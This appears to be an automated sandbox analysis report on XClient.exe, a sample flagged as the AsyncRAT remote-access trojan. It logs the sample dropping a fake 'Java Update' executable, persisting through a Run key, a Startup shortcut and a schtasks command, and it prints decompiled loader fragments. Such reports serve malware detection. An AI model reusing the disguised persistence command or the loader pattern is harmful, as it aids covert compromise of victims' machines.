Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: mscoree.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: apphelp.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: version.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: sspicli.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: mscoree.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: version.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: sspicli.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: mscoree.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: version.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: sspicli.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: mscoree.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: version.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: sspicli.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: mscoree.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: version.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: sspicli.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\Java Update(32bit).exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\XClient.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Java Update(32bit).lnk.0.dr

LNK file: ..\..\..\..\..\..\..\..\..\ProgramData\Java Update(32bit).exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: XClient.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: XClient.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: XClient.exe, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: XClient.exe, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: XClient.exe, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: Java Update(32bit).exe.0.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Java Update(32bit).exe.0.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Java Update(32bit).exe.0.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: XClient.exe, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: XClient.exe, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: XClient.exe, Messages.cs	.Net Code: Memory
Source: Java Update(32bit).exe.0.dr, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: Java Update(32bit).exe.0.dr, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: Java Update(32bit).exe.0.dr, Messages.cs	.Net Code: Memory

Source: C:\Users\user\Desktop\XClient.exe	Code function: 0_2_00007FFD9B877C2D push E95DC1C9h; ret	0_2_00007FFD9B877C79
Source: C:\Users\user\Desktop\XClient.exe	Code function: 0_2_00007FFD9B87867E pushad ; ret	0_2_00007FFD9B87867B
Source: C:\Users\user\Desktop\XClient.exe	Code function: 0_2_00007FFD9B878648 pushad ; ret	0_2_00007FFD9B87867B
Source: C:\Users\user\Desktop\XClient.exe	Code function: 0_2_00007FFD9B877C7B push E95DC1C9h; ret	0_2_00007FFD9B877C79
Source: C:\Users\user\Desktop\XClient.exe	Code function: 0_2_00007FFD9B8700BD pushad ; iretd	0_2_00007FFD9B8700C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B77D2A5 pushad ; iretd	1_2_00007FFD9B77D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B962316 push 8B485F93h; iretd	1_2_00007FFD9B96231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD9B75D2A5 pushad ; iretd	4_2_00007FFD9B75D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD9B8710B8 push E95C2505h; ret	4_2_00007FFD9B871239
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD9B8700BD pushad ; iretd	4_2_00007FFD9B8700C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD9B942316 push 8B485F95h; iretd	4_2_00007FFD9B94231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFD9B78D2A5 pushad ; iretd	7_2_00007FFD9B78D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFD9B972316 push 8B485F92h; iretd	7_2_00007FFD9B97231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9B77D2A5 pushad ; iretd	11_2_00007FFD9B77D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9B962316 push 8B485F93h; iretd	11_2_00007FFD9B96231B
Source: C:\ProgramData\Java Update(32bit).exe	Code function: 15_2_00007FFD9B890028 push eax; retf	15_2_00007FFD9B890029
Source: C:\ProgramData\Java Update(32bit).exe	Code function: 16_2_00007FFD9B8A0700 push ss; retf	16_2_00007FFD9B8A070E
Source: C:\ProgramData\Java Update(32bit).exe	Code function: 18_2_00007FFD9B8A0700 push ss; retf	18_2_00007FFD9B8A070E

Source: C:\Users\user\Desktop\XClient.exe

File created: C:\ProgramData\Java Update(32bit).exe

Jump to dropped file

Source: C:\Users\user\Desktop\XClient.exe

File created: C:\ProgramData\Java Update(32bit).exe

Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: XClient.exe, type: SAMPLE
Source: Yara match	File source: 0.0.XClient.exe.e20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1674357951.0000000000E22000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\Java Update(32bit).exe, type: DROPPED

Creates autostart registry keys with suspicious names

Source: C:\Users\user\Desktop\XClient.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Java Update(32bit)

Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\XClient.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Java Update(32bit)" /tr "C:\ProgramData\Java Update(32bit).exe"

Source: C:\Users\user\Desktop\XClient.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update(32bit).lnk

Jump to behavior

Source: C:\Users\user\Desktop\XClient.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update(32bit).lnk

Jump to behavior

Source: C:\Users\user\Desktop\XClient.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Java Update(32bit)			Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Java Update(32bit)			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
